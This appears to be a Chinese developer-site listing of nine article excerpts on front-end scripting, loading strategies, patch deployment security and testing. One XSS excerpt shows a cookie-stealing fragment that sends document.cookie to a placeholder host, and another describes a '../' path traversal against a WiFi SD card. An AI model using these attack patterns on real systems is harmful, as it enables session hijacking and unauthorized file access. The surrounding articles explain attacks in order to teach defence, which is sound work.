不只是腳本精品文章

• 

  從Nodejs腳本到vue首頁看開源始末的DemoHouse

  ...的釣魚神器，看節(jié)目似乎很有效。通常我們見到的魚鉤就只是上半部分，這里卻多了一個小鉤，其實(shí)他就是我們這里準(zhǔn)備學(xué)習(xí)的hook。 為了達(dá)到某種效果，我們添加的一個腳本，在正常流程執(zhí)行的時候觸發(fā)這個腳本（個人拙略，...

  Gemini 2019-08-22 10:39 評論0 收藏0
• 

  前端安全之XSS攻擊

  ...tp://xxx/get?cookie=+document.cookiePS：這個地址當(dāng)然是沒效的，只是舉例子而已。 結(jié)論： 如果只是1、2、3步做成功，那也只是自己折騰自己而已，如果第4步能做成功，才是個像樣的XSS攻擊。 開發(fā)安全措施： 前端在顯示服務(wù)端數(shù)據(jù)時...

  lmxdawn 2019-08-20 14:25 評論0 收藏0
• 

  現(xiàn)代腳本的加載

  ...你的腳本的HTML文檔的大小。 如果你的HTML載荷很小, 比如只是一個啟動屏或者只是簡單啟動客戶端應(yīng)用，那么放棄預(yù)加載掃描對你的應(yīng)用性能影響很小。如果你的應(yīng)用使用服務(wù)器渲染大量有意義的HTML, 并以流(stream)的方式傳輸給...

  ranwu 2019-08-26 10:13 評論0 收藏0
• 

  JSPatch 部署安全策略

  ...方式其實(shí)原理跟 HTTPS 是一樣的，同樣使用非對稱加密，只是簡化了，把非對稱加密只用于校驗(yàn)文件，而不解決傳輸過程中數(shù)據(jù)內(nèi)容泄露的問題，而我們的目的只是防止傳輸過程中數(shù)據(jù)被篡改，對于數(shù)據(jù)內(nèi)容泄露并不是太在意。...

  qqlcbb 2019-06-21 16:24 評論0 收藏0
• 

  創(chuàng)見WiFi SD卡破解之路

  .../是一樣的效果，成功了！ 哈，太尷尬了！貌似程序員只是確保路徑使用/WWW/SD起始，但沒有驗(yàn)證父目錄的../。通過這種方式，我們可以瀏覽嵌入式系統(tǒng)中的任何文件。當(dāng)然，點(diǎn)擊文件是不會執(zhí)行它們的，只是下載而已，然...

  William_Sang 2019-06-21 16:23 評論0 收藏0
• 

  不用寫代碼，也能做好接口測試

  ...，場景接口測試用例設(shè)計(jì)和UI功能的場景測試用例一樣，只是通過調(diào)用接口來實(shí)現(xiàn)而已。 設(shè)計(jì)接口測試用例，主要從接口入?yún)?、接口處理邏輯、接口返回參?shù)等3個方面入手： 1、設(shè)計(jì)接口入?yún)y試用例，常見參數(shù)類型有：數(shù)值、...

  idisfkj 2019-07-01 10:48 評論0 收藏0
• 

  京東單品頁前端開發(fā)那些不得不說的事兒

  ...了大概 80% 其它的因?yàn)闃I(yè)務(wù)邏輯的問題并沒有完全重寫，只是做了些代碼層面的優(yōu)化。 有一個模板引擎叫 trimPath，知道這個的估計(jì)都算老前端的了。最早的客戶端 JavaScript MVC 模式代表作品，只到現(xiàn)在還是使用。這個階段像評價...

  FleyX 2019-08-22 10:36 評論0 收藏0
• 

  利用 onload 事件監(jiān)控跨站資源

  ...、網(wǎng)絡(luò)通信等也沒有涉及。 不過本文的主題已經(jīng)說了，只是監(jiān)控跨站資源而已，并不攔截。事實(shí)上，如果能夠做到及時發(fā)現(xiàn)問題，就很不錯了。 如果非得通過 JS 來實(shí)現(xiàn)攔截功能，可以參考之前的『XSS 前端防火墻系列』： 內(nèi)...

  leone 2019-08-21 10:26 評論0 收藏0
• 

  動靜分離的數(shù)據(jù)并發(fā)加載策略

  ... JSON.parse(dataC); mainInitByData(dataA, dataB, dataC); } 以上數(shù)據(jù)只是一個例子，并不代表這樣就可以解決這類的問題。假如有一天后端突然要求一次并發(fā)加載10條數(shù)據(jù)，代碼就會變得十分冗余。 既然要處理并發(fā)，那么單并發(fā)的思想是可...

  Object 2019-08-21 14:07 評論0 收藏0